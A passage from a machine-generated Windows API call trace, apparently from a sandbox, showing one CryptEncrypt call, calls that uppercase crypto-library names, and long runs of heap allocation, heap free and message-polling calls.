CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0132.580] CryptEncrypt (in: hKey=0xa875d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f49960*, pdwDataLen=0x8cef60*=0x1309, dwBufLen=0x1310 | out: pbData=0x2f49960*, pdwDataLen=0x8cef60*=0x1310) returned 1 [0132.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0132.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0132.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0132.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0132.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0132.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0132.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0132.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0132.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0132.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0132.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0132.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0132.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0132.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0132.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0132.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0132.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0132.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0132.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0132.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0132.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0132.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0132.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0132.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0132.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0132.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0132.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0132.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0132.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0132.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0132.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0132.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0132.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0132.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0132.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0132.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0132.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0132.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1310) returned 0x2f4ac78 [0132.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0132.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0132.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0132.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0132.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0132.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0132.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0132.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0132.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0132.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0132.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0132.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0132.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1310) returned 0x2f4bf90 [0132.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f4ac78 | out: hHeap=0x970000) returned 1 [0132.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0132.587] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0132.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0132.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0132.621] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0132.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0132.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0132.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0132.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0132.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0132.621] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0132.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0132.621] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0132.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0132.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0132.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0132.622] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0132.622] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0132.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0132.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0132.622] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0132.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0132.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0132.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0132.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0132.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0132.623] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0132.623] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0132.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0132.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0132.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0132.623] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0132.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0132.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0132.623] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0132.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0132.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0132.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0132.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0132.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0132.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0132.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0132.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0132.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 